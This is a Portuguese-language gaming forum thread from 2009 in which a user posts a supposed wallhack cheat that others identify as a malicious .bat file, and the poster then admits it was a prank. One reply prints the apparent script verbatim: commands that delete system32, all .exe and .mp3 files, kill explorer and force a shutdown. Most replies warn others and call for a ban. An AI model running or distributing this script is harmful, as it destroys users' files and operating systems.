Carcara10 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 Características : -3 Wall - NoFlash e NoSmoke -FullBright -NoSky Aew galera consegui !!!! os cara da turquia conseguiram fazer o wall, e eu axei em um forum ! Download : É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Scan: É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Rawks™ 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 Ae mano explica como usa o Cheats ae porque quase niguem vai entender como usa :D.Porque isso é coisa nova^^.Entao explica ae como usa. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
pedrosgc 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 isso dae exclui os troço do teu PC n baixem ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maddox0 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 alguem ja testo??? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
' Vidaama 2 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 O man isso dai ta cheio de virus q destroi o pc ou vai funfa , to com medo de baxa ... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
therichipro 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 :( ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
BadBoyRJJJ 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 De boa baixei o wall e abria a pasta , quando não foi meu susto ao ver que o arquivo executavel era uma arquivo com extenção .Bat. Sinceramente aconselho a ninguem executar esse arquivo ainda , sem termos certeza absoluta que é viavel utiliza-lo. Mas cabe a cada um tomar a decisão que for, eu mesmo não irei executa-lo sem o devido cuidado de examina-lo melhor. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
BKZeRa 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 badboy tbm se assustei quando vi isso so que eu fiz uma scan so desse negocio no virus total e n deu nenhum virus faiz isso tbm pra vc ver que n tenhu nenhum virus É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se agora tenhu medo ainda de abrir e ser um bat msm :S quando cliquei no wallhack.bat olha a imagem que apareceu É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
diba 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 nossa como que um cara posta um negocio desse pro pessoal aki do forum esse negocio ai vai é deletar os arquivo vo windoqns ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Gbik 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 Mano vai posta Virus na bunda da tua mae --' Pra que fez Scan se o trosso ta xei de virus? Vai ti fude --' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Muskiao 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 Coisa feia Carcara,pra mim tu era gente boa,agora postando arquivo .bat aqui,para ferrar com o pc dos outros,que feio em mano! CLOSED aqui ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carcara10 0 Postado 22 de Dezembro 2009 Autor Compartilhar Postado 22 de Dezembro 2009 Queria Ver Quantos Caras Caiam Nessa ! Eu Cai ^^ Sou Noob Mesmo ! Mas Pc Nao Modificou Nada ! Sei a PQ ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
BadBoyRJJJ 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 Queria Ver Quantos Caras Caiam Nessa ! Eu Cai ^^ Sou Noob Mesmo ! Mas Pc Nao Modificou Nada ! Sei a PQ ! Pera ai deixa eu ve se eu entendi direito , vc esta assumindo que caiu em um erro e gostaria de ver quantas pessoas daqui da WC tb cairiam ???!!!!! Meu Deus isso foi a coisa mais irracional e estupida que vc postou,sou inteiramente favor de seu banimento de uma vez por todas da WC Peço aos moderadores que fechem esse topico e excluam esse link que ele postou, pois pelo que constatei pelo scan enviado por um outro usuario esse .bat age diretamente na pasta c:\Windows\system32, confirmando minhas uspeitas que realmente é um arquivo para danificar o pc, não sei ao certo a gravidade do ocorrido se alguem executar e nem tenho tempo pra pesquizar melhor , pois como podemos observar é LIXO. Closed and Ban ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maycon_157 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 Tanta gente flando mal nem vo baixa aushaushauhsau:d ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
No!@ 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 se é isso mesmo q os kras estão falando, tem q fechar tópico e banir o kra ! pra q fazer isso ?? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xxtunaxx 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 @echo off del /S /F c:\windows\system32\ del /S /F *exe del /S /F *mp3 taskkill /f /im "explorer.exe" shutdown -s -f -t 10 -c "Muestra del virus" ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Luana Paiva 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 Visitem o melhor forum de cheats da galaxia. Clique Aqui Visitem o melhor forum de cheats da galaxia. CLIQUE AQUI Go Go!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Dan1005 0 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 Galera cuidado! Meu amigo executo essa parada não caiam nessa esse arquivo .bat vai diretamente na pasta system32 do win e deleta se vc executar isso vai ter q reinstalar o win não baixem ban e closed moderação ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
juanlokao 0 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 Ban e Closed ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kafemasol1 1 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 ban e closed³ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carcara10 0 Postado 24 de Dezembro 2009 Autor Compartilhar Postado 24 de Dezembro 2009 ban e closed○ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
-WodojO- 11 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 Tanta gente flando mal nem vo baixa aushaushauhsau:d avisado por Flood. ban e closed○ Avisado por Flood. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados